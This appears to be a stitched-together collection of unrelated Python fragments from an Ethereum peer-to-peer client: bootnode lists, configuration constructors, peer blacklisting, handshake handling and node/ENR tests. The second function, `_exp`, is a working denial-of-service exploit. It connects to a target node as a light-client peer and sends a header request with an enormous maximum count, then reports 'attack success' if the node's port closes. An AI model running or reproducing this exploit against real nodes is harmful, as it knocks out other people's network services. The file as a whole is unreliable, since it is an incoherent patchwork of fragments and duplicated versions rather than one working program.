def get_nodes_to_connect(self) -> Generator[Node, None, None]: from evm.chains.ropsten import RopstenChain from evm.chains.mainnet import MainnetChain if self.network_id == MainnetChain.network_id: yield Node(keys.PublicKey(decode_hex("1118980bf48b0a3640bdba04e0fe78b1add18e1cd99bf22d53daac1fd9972ad650df52176e7c7d89d1114cfef2bc23a2959aa54998a46afcf7d91809f0855082")), # noqa: E501 Address("52.74.57.123", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("78de8a0916848093c73790ead81d1928bec737d565119932b98c6b100d944b7a95e94f847f689fc723399d2e31129d182f7ef3863f2b4c820abbf3ab2722344d")), # noqa: E501 Address("191.235.84.50", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("ddd81193df80128880232fc1deb45f72746019839589eeb642d3d44efbb8b2dda2c1a46a348349964a6066f8afb016eb2a8c0f3c66f32fadf4370a236a4b5286")), # noqa: E501 Address("52.231.202.145", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("3f1d12044546b76342d59d4a05532c14b85aa669704bfe1f864fe079415aa2c02d743e03218e57a33fb94523adb54032871a6c51b2cc5514cb7c7e35b3ed0a99")), # noqa: E501 Address("13.93.211.84", 30303, 30303)) elif self.network_id == RopstenChain.network_id: yield Node(keys.PublicKey(decode_hex("88c2b24429a6f7683fbfd06874ae3f1e7c8b4a5ffb846e77c705ba02e2543789d66fc032b6606a8d8888eb6239a2abe5897ce83f78dcdcfcb027d6ea69aa6fe9")), # noqa: E501 Address("163.172.157.61", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("a1ef9ba5550d5fac27f7cbd4e8d20a643ad75596f307c91cd6e7f85b548b8a6bf215cca436d6ee436d6135f9fe51398f8dd4c0bd6c6a0c332ccb41880f33ec12")), # noqa: E501 Address("51.15.218.125", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("e80276aabb7682a4a659f4341c1199de79d91a2e500a6ee9bed16ed4ce927ba8d32ba5dea357739ffdf2c5bcc848d3064bb6f149f0b4249c1f7e53f8bf02bfc8")), # noqa: E501 Address("51.15.39.57", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("584c0db89b00719e9e7b1b5c32a4a8942f379f4d5d66bb69f9c7fa97fa42f64974e7b057b35eb5a63fd7973af063f9a1d32d8c60dbb4854c64cb8ab385470258")), # noqa: E501 Address("51.15.35.2", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("d40871fc3e11b2649700978e06acd68a24af54e603d4333faecb70926ca7df93baa0b7bf4e927fcad9a7c1c07f9b325b22f6d1730e728314d0e4e6523e5cebc2")), # noqa: E501 Address("51.15.132.235", 30303, 30303)) yield Node(keys.PublicKey(decode_hex("482484b9198530ee2e00db89791823244ca41dcd372242e2e1297dd06f6d8dd357603960c5ad9cc8dc15fcdf0e4edd06b7ad7db590e67a0b54f798c26581ebd7")), # noqa: E501 Address("51.15.75.138", 30303, 30303)) else: raise ValueError("Unknown network_id: {}".format(self.network_id))
def _exp(node_url, chain) -> None: from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION from evm.db.backends.memory import MemoryDB from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop ip, port = node_url.split('@')[1].split(':') if port_probe(ip, port): print('The port is open, starting to attack...') peer_class = LESPeer peer_pool = None if chain == 'mainnet': block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3' headerdb = FakeAsyncHeaderDB(MemoryDB()) headerdb.persist_header(MAINNET_GENESIS_HEADER) network_id = MainnetChain.network_id nodes = [Node.from_uri(node_url)] peer_pool = PeerPool(peer_class, headerdb, network_id, ecies.generate_privkey(), MAINNET_VM_CONFIGURATION) elif chain == 'testnet': block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d' headerdb = FakeAsyncHeaderDB(MemoryDB()) headerdb.persist_header(ROPSTEN_GENESIS_HEADER) network_id = RopstenChain.network_id nodes = [Node.from_uri(node_url)] peer_pool = PeerPool(peer_class, headerdb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION) loop = asyncio.get_event_loop() async def attack() -> None: nonlocal peer_pool nonlocal block_hash while not peer_pool.peers: print("Waiting for peer connection...") await asyncio.sleep(1) peer = cast(LESPeer, peer_pool.peers[0]) cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset) data = { 'request_id': 1, 'query': GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff, False), } header, body = cmd.encode(data) peer.sub_proto.send(header, body) await asyncio.sleep(1) result = port_probe(ip, port) if not result: print('The port is closed,attack success ...') exit() t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes)) t2 = asyncio.ensure_future(attack()) loop.set_debug(True) loop.run_until_complete(asyncio.wait([t1, t2])) loop.close()
def __init__(self, network_id: int, max_peers: int = DEFAULT_MAX_PEERS, data_dir: str = None, nodekey_path: str = None, logfile_path: str = None, nodekey: PrivateKey = None, sync_mode: str = SYNC_FULL, port: int = 30303, preferred_nodes: Tuple[KademliaNode, ...] = None, bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None: self.network_id = network_id self.max_peers = max_peers self.sync_mode = sync_mode self.port = port if not preferred_nodes and network_id in DEFAULT_PREFERRED_NODES: self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id] else: self.preferred_nodes = preferred_nodes if bootstrap_nodes is None: if self.network_id == MAINNET_NETWORK_ID: self.bootstrap_nodes = tuple( KademliaNode.from_uri(enode) for enode in MAINNET_BOOTNODES) elif self.network_id == ROPSTEN_NETWORK_ID: self.bootstrap_nodes = tuple( KademliaNode.from_uri(enode) for enode in ROPSTEN_BOOTNODES) else: self.bootstrap_nodes = bootstrap_nodes # validation if nodekey is not None and nodekey_path is not None: raise ValueError( "It is invalid to provide both a `nodekey` and a `nodekey_path`" ) # set values if data_dir is not None: self.data_dir = data_dir else: self.data_dir = get_data_dir_for_network_id(self.network_id) if nodekey_path is not None: self.nodekey_path = nodekey_path elif nodekey is not None: self.nodekey = nodekey if logfile_path is not None: self.logfile_path = logfile_path else: self.logfile_path = get_logfile_path(self.data_dir)
def from_parser_args(cls, args: argparse.Namespace, trinity_config: TrinityConfig) -> 'BaseAppConfig': if args is not None: # This is quick and dirty way to get bootstrap_nodes trinity_config.bootstrap_nodes = tuple( KademliaNode.from_uri(enode) for enode in args.bootstrap_nodes.split( ',')) if args.bootstrap_nodes is not None else tuple() trinity_config.preferred_nodes = tuple( KademliaNode.from_uri(enode) for enode in args.preferred_nodes.split( ',')) if args.preferred_nodes is not None else tuple() return cls(trinity_config)
def _get_peer_candidates(self, num_requested: int, connected_remotes: Set[Node]) -> Iterable[Node]: """ Return up to `num_requested` candidates sourced from peers whe have historically connected to which match the following criteria: * Matches all of: network_id, protocol, genesis_hash, protocol_version * Either has no blacklist record or existing blacklist record is expired. * Not in the set of remotes we are already connected to. """ connected_uris = set(remote.uri() for remote in connected_remotes) now = datetime.datetime.utcnow() metadata_filters = self._get_candidate_filter_query() # Query the database for peers that match our criteria. candidates = self.session.query(Remote).outerjoin( # type: ignore # Join against the blacklist records with matching node URI Remote.blacklist, ).filter( # Either they have no blacklist record or the record is expired. ((Remote.blacklist == None) | (BlacklistRecord.expires_at <= now)), # noqa: E711 # We are not currently connected to them ~Remote.uri.in_(connected_uris), # type: ignore # They match our filters for network metadata *metadata_filters, ).order_by( # We want the ones that we have recently connected to succesfully to be first. Remote.last_connected_at.desc(), # type: ignore ) # Return them as an iterator to allow the consuming process to # determine how many records it wants to fetch. for candidate in candidates: yield Node.from_uri(candidate.uri)
async def test_get_local_enr(manually_driven_discovery): discovery = manually_driven_discovery enr = await discovery.get_local_enr() validate_node_enr(discovery.this_node, enr, sequence_number=1) old_node = copy.copy(discovery.this_node) # If our node's details change but an ENR refresh is not due yet, we'll get the ENR for the # old node. discovery.this_node.address.udp_port += 1 assert discovery._local_enr_next_refresh > time.monotonic() enr = await discovery.get_local_enr() validate_node_enr(old_node, enr, sequence_number=1) # If a local ENR refresh is due, get_local_enr() will create a fresh ENR with a new sequence # number. discovery._local_enr_next_refresh = time.monotonic() - 1 enr = await discovery.get_local_enr() validate_node_enr(discovery.this_node, enr, sequence_number=2) # The new ENR will also be stored in our DB. our_node = Node(discovery.enr_db.get_enr(discovery.this_node.id)) assert enr == our_node.enr # And the next refresh time will be updated. assert discovery._local_enr_next_refresh > time.monotonic()
async def addPeer(self, uri: str) -> None: validate_enode_uri(uri, require_ip=True) await self.event_bus.broadcast( ConnectToNodeCommand(Node.from_uri(uri)), TO_NETWORKING_BROADCAST_CONFIG )
async def test_bootstrap_nodes(): private_key = PrivateKeyFactory().to_bytes() bootnode1 = ENRFactory(private_key=private_key) bootnode2 = ENRFactory() discovery = MockDiscoveryService([Node(bootnode1), Node(bootnode2)]) assert discovery.enr_db.get_enr(bootnode1.node_id) == bootnode1 assert discovery.enr_db.get_enr(bootnode2.node_id) == bootnode2 assert [node.enr for node in discovery.bootstrap_nodes] == [bootnode1, bootnode2] # If our DB gets updated with a newer ENR of one of our bootnodes, the @bootstrap_nodes # property will reflect that. new_bootnode1 = ENRFactory( private_key=private_key, sequence_number=bootnode1.sequence_number + 1) discovery.enr_db.set_enr(new_bootnode1) assert [node.enr for node in discovery.bootstrap_nodes] == [new_bootnode1, bootnode2]
def from_parser_args(cls, args: argparse.Namespace, trinity_config: TrinityConfig) -> 'BaseAppConfig': """ Initialize from the namespace object produced by an ``argparse.ArgumentParser`` and the :class:`~trinity.config.TrinityConfig` """ if args is not None: # This is quick and dirty way to get bootstrap_nodes trinity_config.bootstrap_nodes = tuple( KademliaNode.from_uri(enode) for enode in args.bootstrap_nodes.split(',') ) if args.bootstrap_nodes is not None else tuple() trinity_config.preferred_nodes = tuple( KademliaNode.from_uri(enode) for enode in args.preferred_nodes.split(',') ) if args.preferred_nodes is not None else tuple() return cls(trinity_config)
def __init__(self, network_id: int, app_identifier: str = "", genesis_config: Dict[str, Any] = None, max_peers: int = 25, trinity_root_dir: Path = None, trinity_tmp_root_dir: bool = False, data_dir: Path = None, nodekey_path: Path = None, nodekey: PrivateKey = None, port: int = 30303, preferred_nodes: Tuple[KademliaNode, ...] = None, bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None: self.app_identifier = app_identifier self.network_id = network_id self.max_peers = max_peers self.port = port self._app_configs = {} if genesis_config is not None: self.genesis_config = genesis_config elif network_id in PRECONFIGURED_NETWORKS: self.genesis_config = _load_preconfigured_genesis_config( network_id) else: raise TypeError( "No `genesis_config` was provided and the `network_id` is not " "in the known preconfigured networks. Cannot initialize " "ChainConfig") if trinity_root_dir is not None: self.trinity_root_dir = trinity_root_dir self.trinity_tmp_root_dir = trinity_tmp_root_dir if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES: self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id] else: self.preferred_nodes = preferred_nodes if bootstrap_nodes is None: if self.network_id in PRECONFIGURED_NETWORKS: bootnodes = PRECONFIGURED_NETWORKS[self.network_id].bootnodes self.bootstrap_nodes = tuple( KademliaNode.from_uri(enode) for enode in bootnodes) else: self.bootstrap_nodes = tuple() else: self.bootstrap_nodes = bootstrap_nodes if data_dir is not None: self.data_dir = data_dir if nodekey is not None and nodekey_path is not None: raise ValueError( "It is invalid to provide both a `nodekey` and a `nodekey_path`" ) elif nodekey_path is not None: self.nodekey_path = nodekey_path elif nodekey is not None: self.nodekey = nodekey
def _test() -> None: import argparse import signal from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION from p2p import ecies from p2p.kademlia import Node from p2p.peer import DEFAULT_PREFERRED_NODES from tests.trinity.core.integration_test_helpers import ( FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop) logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s') parser = argparse.ArgumentParser() parser.add_argument('-db', type=str, required=True) parser.add_argument('-debug', action="store_true") parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to") args = parser.parse_args() log_level = logging.INFO if args.debug: log_level = logging.DEBUG db = FakeAsyncLevelDB(args.db) chaindb = FakeAsyncChainDB(db) network_id = RopstenChain.network_id if args.enode: nodes = tuple([Node.from_uri(args.enode)]) else: nodes = DEFAULT_PREFERRED_NODES[network_id] peer_pool = PeerPool( ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION) asyncio.ensure_future(peer_pool.run()) peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes)) head = chaindb.get_canonical_head() downloader = StateDownloader(chaindb, db, head.state_root, peer_pool) downloader.logger.setLevel(log_level) loop = asyncio.get_event_loop() sigint_received = asyncio.Event() for sig in [signal.SIGINT, signal.SIGTERM]: loop.add_signal_handler(sig, sigint_received.set) async def exit_on_sigint() -> None: await sigint_received.wait() await peer_pool.cancel() await downloader.cancel() loop.stop() async def run() -> None: await downloader.run() downloader.logger.info("run() finished, exiting") sigint_received.set() # loop.set_debug(True) asyncio.ensure_future(exit_on_sigint()) asyncio.ensure_future(run()) loop.run_forever() loop.close()
def _test() -> None: import argparse import asyncio import signal from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION from eth.db.backends.level import LevelDB from p2p import ecies from p2p.kademlia import Node from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES from trinity.protocol.common.context import ChainContext from tests.trinity.core.integration_test_helpers import ( FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop) logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s') parser = argparse.ArgumentParser() parser.add_argument('-db', type=str, required=True) parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to") args = parser.parse_args() chaindb = FakeAsyncChainDB(LevelDB(args.db)) chain = FakeAsyncRopstenChain(chaindb) network_id = RopstenChain.network_id privkey = ecies.generate_privkey() context = ChainContext(headerdb=chaindb, network_id=network_id, vm_configuration=ROPSTEN_VM_CONFIGURATION) peer_pool = ETHPeerPool(privkey=privkey, context=context) if args.enode: nodes = tuple([Node.from_uri(args.enode)]) else: nodes = DEFAULT_PREFERRED_NODES[network_id] asyncio.ensure_future(peer_pool.run()) peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes)) loop = asyncio.get_event_loop() syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool) sigint_received = asyncio.Event() for sig in [signal.SIGINT, signal.SIGTERM]: loop.add_signal_handler(sig, sigint_received.set) async def exit_on_sigint() -> None: await sigint_received.wait() await syncer.cancel() await peer_pool.cancel() loop.stop() loop.set_debug(True) asyncio.ensure_future(exit_on_sigint()) asyncio.ensure_future(syncer.run()) loop.run_forever() loop.close()
def test_node_from_enode_uri(): pubkey = 'a979fb575495b8d6db44f750317d0f4622bf4c2aa3365d6af7c284339968eef29b69ad0dce72a4d8db5ebb4968de0e3bec910127f134779fbcb0cb6d3331163c' # noqa: E501 ip = '52.16.188.185' port = 30303 uri = 'enode://%s@%s:%d' % (pubkey, ip, port) node = Node.from_uri(uri) assert node.address.ip == ip assert node.address.udp_port == node.address.tcp_port == port assert node.pubkey.to_hex() == '0x' + pubkey
async def test_shard_syncer(n_peers, connections): cancel_token = CancelToken("canceltoken") PeerTuple = collections.namedtuple("PeerTuple", ["node", "server", "syncer"]) peer_tuples = [] for i in range(n_peers): private_key = keys.PrivateKey(pad32(int_to_big_endian(i + 1))) port = get_open_port() address = Address("127.0.0.1", port, port) node = Node(private_key.public_key, address) server = ShardingServer(private_key, address, network_id=9324090483, min_peers=0, peer_class=ShardingPeer) asyncio.ensure_future(server.run()) peer_tuples.append( PeerTuple( node=node, server=server, syncer=server.syncer, )) # connect peers to each other await asyncio.gather(*[ peer_tuples[i].server.peer_pool._connect_to_nodes( [peer_tuples[j].node]) for i, j in connections ]) for i, j in connections: peer_remotes = [ peer.remote for peer in peer_tuples[i].server.peer_pool.peers ] assert peer_tuples[j].node in peer_remotes # let each node propose and check that collation appears at all other nodes for proposer in peer_tuples: collation = proposer.syncer.propose() await asyncio.wait_for(asyncio.gather(*[ peer_tuple.syncer.collations_received_event.wait() for peer_tuple in peer_tuples if peer_tuple != proposer ]), timeout=10) for peer_tuple in peer_tuples: assert peer_tuple.syncer.shard.get_collation_by_hash( collation.hash) == collation # stop everything cancel_token.trigger() await asyncio.gather( *[peer_tuple.server.cancel() for peer_tuple in peer_tuples]) await asyncio.gather( *[peer_tuple.syncer.cancel() for peer_tuple in peer_tuples])
def test_node_from_enr_uri(): privkey = PrivateKeyFactory() address = AddressFactory() enr = ENRFactory(private_key=privkey.to_bytes(), address=address) node = Node.from_uri(repr(enr)) assert node.id == keccak(privkey.public_key.to_bytes()) assert node.address == address
def test_node_constructor(): privkey = PrivateKeyFactory() address = AddressFactory() enr = ENRFactory(private_key=privkey.to_bytes(), address=address) node = Node(enr) assert node.id == keccak(privkey.public_key.to_bytes()) assert node.address == address
def _fetch_bad_node(self, remote: Node) -> Optional[BadNode]: enode = remote.uri() cursor = self.db.execute('SELECT * from bad_nodes WHERE enode = ?', (enode, )) row = cursor.fetchone() if not row: return None result = BadNode(row['enode'], row['until'], row['reason'], row['error_count']) return result
def enodeToMultiAddress(_node): u = urllib.parse.urlparse(_node) pubkey = bytearray.fromhex(u.username) xpub = keys.PublicKey(pubkey) nn = Node.from_pubkey_and_addr(xpub, Address(u.hostname, u.port, u.port)) nodeid = base58.b58encode(nn.id) return multiaddr.Multiaddr("/ip4/" + u.hostname + "/tcp/" + str(u.port) + "/p2p/" + nodeid.decode("utf-8"))
def __call__(self, parser, namespace, values, option_string=None): if values is None: return enode = Node.from_uri(values) if getattr(namespace, self.dest) is None: setattr(namespace, self.dest, []) enode_list = getattr(namespace, self.dest) enode_list.append(enode)
async def receive_handshake(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None: # Use reader to read the auth_init msg until EOF msg = await reader.read(ENCRYPTED_AUTH_MSG_LEN) # Use HandshakeResponder.decode_authentication(auth_init_message) on auth init msg try: ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication( msg, self.privkey) # Try to decode as EIP8 except DecryptionError: msg_size = big_endian_to_int(msg[:2]) remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2 msg += await reader.read(remaining_bytes) ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication( msg, self.privkey) # Get remote's address: IPv4 or IPv6 ip, port, *_ = writer.get_extra_info("peername") remote_address = Address(ip, port) # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance initiator_remote = Node(initiator_pubkey, remote_address) responder = HandshakeResponder(initiator_remote, self.privkey) # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply responder_nonce = secrets.token_bytes(HASH_LEN) auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce) auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg) # Use the `writer` to send the reply to the remote writer.write(auth_ack_ciphertext) await writer.drain() # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer` aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets( initiator_nonce=initiator_nonce, responder_nonce=responder_nonce, remote_ephemeral_pubkey=ephem_pubkey, auth_init_ciphertext=msg, auth_ack_ciphertext=auth_ack_ciphertext) # Create and register peer in peer_pool eth_peer = ETHPeer(remote=initiator_remote, privkey=self.privkey, reader=reader, writer=writer, aes_secret=aes_secret, mac_secret=mac_secret, egress_mac=egress_mac, ingress_mac=ingress_mac, chaindb=self.chaindb, network_id=self.network_id) self.peer_pool.add_peer(eth_peer)
def _extract_nodes_from_payload( sender: AddressAPI, payload: List[Tuple[str, bytes, bytes, bytes]], logger: ExtendedDebugLogger) -> Iterator[NodeAPI]: for item in payload: ip, udp_port, tcp_port, node_id = item address = Address.from_endpoint(ip, udp_port, tcp_port) if check_relayed_addr(sender, address): yield Node(keys.PublicKey(node_id), address) else: logger.debug("Skipping invalid address %s relayed by %s", address, sender)
def enrToMultiAddress(_enr): knode = KNode.from_enr_repr(_enr) return { "enode": knode.uri(), "enrdata": { "address": knode.address, "pubkey": knode.pubkey, "id": knode.id }, "enritems": ENR.from_repr(_enr).items(), "multiaddr": Handler.enodeToMultiAddress(knode.uri()) }
def _make_node_with_enr_and_forkid(genesis_hash, head, vm_config): fork_blocks = forkid.extract_fork_blocks(vm_config) node_forkid = forkid.make_forkid(genesis_hash, head, fork_blocks) ip = socket.inet_aton(IPAddressFactory.generate()) udp_port = 30304 enr = ENRFactory( custom_kv_pairs={ b'eth': sedes.List([forkid.ForkID]).serialize([node_forkid]), IP_V4_ADDRESS_ENR_KEY: ip, UDP_PORT_ENR_KEY: udp_port, TCP_PORT_ENR_KEY: udp_port, }) return Node(enr)
def _test(): import argparse import asyncio from concurrent.futures import ProcessPoolExecutor import signal from p2p import ecies from p2p.kademlia import Node from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION from evm.db.backends.level import LevelDB from tests.p2p.integration_test_helpers import ( FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop) logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s') parser = argparse.ArgumentParser() parser.add_argument('-db', type=str, required=True) parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to") args = parser.parse_args() chaindb = FakeAsyncChainDB(LevelDB(args.db)) chain = FakeAsyncRopstenChain(chaindb) network_id = RopstenChain.network_id privkey = ecies.generate_privkey() peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION) if args.enode: nodes = tuple([Node.from_uri(args.enode)]) else: nodes = DEFAULT_PREFERRED_NODES[network_id] asyncio.ensure_future(peer_pool.run()) asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes)) loop = asyncio.get_event_loop() loop.set_default_executor(ProcessPoolExecutor()) syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool) sigint_received = asyncio.Event() for sig in [signal.SIGINT, signal.SIGTERM]: loop.add_signal_handler(sig, sigint_received.set) async def exit_on_sigint(): await sigint_received.wait() await syncer.cancel() await peer_pool.cancel() loop.stop() loop.set_debug(True) asyncio.ensure_future(exit_on_sigint()) asyncio.ensure_future(syncer.run()) loop.run_forever() loop.close()
def record_blacklist(self, remote: Node, timeout_seconds: int, reason: str) -> None: try: record = self._get_record(remote.uri()) except NoResultFound: expires_at = datetime.datetime.utcnow() + datetime.timedelta( seconds=timeout_seconds) self._create_record(remote, expires_at, reason) else: scaled_expires_at = adjust_repeat_offender_timeout( timeout_seconds, record.error_count + 1, ) self._update_record(remote, scaled_expires_at, reason)
async def test_lookup_and_maybe_update_enr_new_node(): discovery = MockDiscoveryService([]) privkey = PrivateKeyFactory() address = AddressFactory() # When looking up the ENR for a node we haven't heard about before, we'll create a stub ENR # and add that into our DB. enr = discovery.lookup_and_maybe_update_enr(privkey.public_key, address) assert enr.sequence_number == 0 node = Node(enr) assert node.pubkey == privkey.public_key assert node.address == address db_enr = discovery.enr_db.get_enr(node.id) assert db_enr == enr
def __call__(self, parser: argparse.ArgumentParser, namespace: argparse.Namespace, value: Any, option_string: str=None) -> None: if value is None: return enode = Node.from_uri(value) if getattr(namespace, self.dest) is None: setattr(namespace, self.dest, []) enode_list = getattr(namespace, self.dest) enode_list.append(enode)
async def removePeer(self, uri: str) -> bool: validate_enode_uri(uri, require_ip=True) peer_to_remove = Node.from_uri(uri) response = await self.event_bus.request(GetConnectedPeersRequest()) for connected_peer_info in response.peers: if peer_to_remove == connected_peer_info.session.remote: await self.event_bus.broadcast( DisconnectFromPeerCommand( connected_peer_info, DisconnectReason.DISCONNECT_REQUESTED, ), ) return True return False
async def test_lookup_and_maybe_update_enr_existing_node_different_address(): discovery = MockDiscoveryService([]) privkey = PrivateKeyFactory() address = AddressFactory() # If the address given is different than the one we have in our DB, though, a stub ENR would # be created and stored in our DB, replacing the existing one. enr = ENRFactory(private_key=privkey.to_bytes(), address=address) discovery.enr_db.set_enr(enr) new_address = AddressFactory() lookedup_enr = discovery.lookup_and_maybe_update_enr(privkey.public_key, new_address) assert lookedup_enr != enr assert lookedup_enr.public_key == enr.public_key assert lookedup_enr.sequence_number == 0 assert Node(lookedup_enr).address == new_address assert lookedup_enr == discovery.enr_db.get_enr(enr.node_id)
def test_node_constructor(): privkey = PrivateKeyFactory() ip = socket.inet_aton(IPAddressFactory.generate()) udp_port = tcp_port = 30303 enr = ENRFactory(private_key=privkey.to_bytes(), custom_kv_pairs={ IP_V4_ADDRESS_ENR_KEY: ip, UDP_PORT_ENR_KEY: udp_port }) node = Node(enr) assert node.id == keccak(privkey.public_key.to_bytes()) assert node.address.ip_packed == ip assert node.address.tcp_port == tcp_port assert node.address.udp_port == udp_port